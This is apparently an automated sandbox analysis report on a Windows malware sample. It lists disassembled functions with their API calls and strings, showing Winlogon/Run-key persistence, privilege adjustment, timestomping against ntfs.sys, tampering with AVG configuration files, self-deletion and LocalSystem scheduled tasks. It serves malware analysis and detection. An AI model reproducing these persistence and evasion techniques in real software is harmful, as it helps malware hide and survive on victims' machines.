                                                                                                                                                                                                              control_flow_graph 207 4000f1-4001e3 call 4001ca 212 4001e5-400258 207->212 213 400259 207->213 214 40025a-401011 212->214 213->214 219 401017-40101a 214->219 220 40113c-401141 214->220 219->220 221 401020-401022 219->221 221->220 222 401028-401044 CreateFileA 221->222 223 401139 222->223 224 40104a-401051 call 401e00 222->224 223->220 227 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 224->227 228 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 224->228 227->228 231 40106a-401089 GetSecurityDescriptorSacl 227->231 229 401105 228->229 230 4010f5-401103 SetEndOfFile 228->230 232 401108-401111 229->232 230->229 230->232 233 4010a0-4010a4 LocalFree 231->233 234 40108b-40109a SetNamedSecurityInfoA 231->234 235 401113-401120 GetHandleInformation 232->235 236 40112f-401136 232->236 233->228 234->233 235->236 237 401122-401126 235->237 237->236 238 401128-401129 CloseHandle 237->238 238->236
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                              • Instruction ID: f59e5f2c9003a6e204812eb1f8c7eb33969ee6ba3e941ca0e7e6302637e7b3a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9781346150E3C06FE7138B609C68B963FB49F57700F1A41EBE680EB1E3D26C4849C366
                                                                                                                                                                                                              Function 00401000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 239 401000-401011 240 401017-40101a 239->240 241 40113c-401141 239->241 240->241 242 401020-401022 240->242 242->241 243 401028-401044 CreateFileA 242->243 244 401139 243->244 245 40104a-401051 call 401e00 243->245 244->241 248 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 245->248 249 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 245->249 248->249 252 40106a-401089 GetSecurityDescriptorSacl 248->252 250 401105 249->250 251 4010f5-401103 SetEndOfFile 249->251 253 401108-401111 250->253 251->250 251->253 254 4010a0-4010a4 LocalFree 252->254 255 40108b-40109a SetNamedSecurityInfoA 252->255 256 401113-401120 GetHandleInformation 253->256 257 40112f-401136 253->257 254->249 255->254 256->257 258 401122-401126 256->258 258->257 259 401128-401129 CloseHandle 258->259 259->257
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                              Function 00402930 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 260 402930-40296f RegCreateKeyExA 261 402975-4029d9 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 260->261 262 4029fd-402a1e RegCreateKeyExA 260->262 263 4029e0-4029e5 261->263 264 402a20-402a22 262->264 265 402a44-402a4a 262->265 263->263 266 4029e7-4029fb 263->266 267 402a25-402a2a 264->267 268 402a4c-402a57 RegFlushKey RegCloseKey 265->268 269 402a5d-402a60 265->269 270 402a3e RegSetValueExA 266->270 267->267 271 402a2c-402a3d 267->271 268->269 270->265 271->270
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                              • userinit, xrefs: 00402A38
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                              • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3547530944-2324515132
                                                                                                                                                                                                              • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                              Function 004014B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93processstringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 346 4014b0-401531 memset * 2 lstrcpynA CreateProcessA 347 401533-401543 346->347 348 40158f-401597 346->348 349 401545-40154e GetHandleInformation 347->349 350 40155d-401567 347->350 349->350 351 401550-401554 349->351 352 401581-40158c 350->352 353 401569-401572 GetHandleInformation 350->353 351->350 354 401556-401557 CloseHandle 351->354 353->352 355 401574-401578 353->355 354->350 355->352 356 40157a-40157b CloseHandle 355->356 356->352
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 2248944234-2746444292
                                                                                                                                                                                                              • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                              Function 00401BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 357 401be0-401c0c CreateFileA 358 401c12-401c2e GetFileTime 357->358 359 401ca5-401caa 357->359 360 401c30-401c3d GetHandleInformation 358->360 361 401c4c-401c69 CreateFileA 358->361 360->361 362 401c3f-401c43 360->362 361->359 363 401c6b-401c87 SetFileTime 361->363 362->361 364 401c45-401c46 CloseHandle 362->364 363->359 365 401c89-401c96 GetHandleInformation 363->365 364->361 365->359 366 401c98-401c9c 365->366 366->359 367 401c9e-401c9f CloseHandle 366->367 367->359
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                              • SetFileTime.KERNELBASE(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                              • API String ID: 1046229350-2760794270
                                                                                                                                                                                                              • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                              Function 004012B0 Relevance: 13.6, APIs: 9, Instructions: 66fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                              • PathFileExistsA.KERNELBASE(?), ref: 00401302
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                              • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040135C
                                                                                                                                                                                                              • DeleteFileA.KERNELBASE(?), ref: 00401369
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2787354276-0
                                                                                                                                                                                                              • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                              Function 00402450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                              • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFolderMovePath
                                                                                                                                                                                                              • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                              • API String ID: 1404575960-1083204512
                                                                                                                                                                                                              • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                              Function 0040219A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: v-@
                                                                                                                                                                                                              • API String ID: 3664257935-4190885519
                                                                                                                                                                                                              • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 00403560 Relevance: 65.1, APIs: 32, Strings: 5, Instructions: 368memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                              • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,75C8DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,75C8DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,75C8DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • <Actions , xrefs: 0040380A
                                                                                                                                                                                                              • task%d, xrefs: 0040365C
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                              • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                              • 00-->, xrefs: 0040383F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
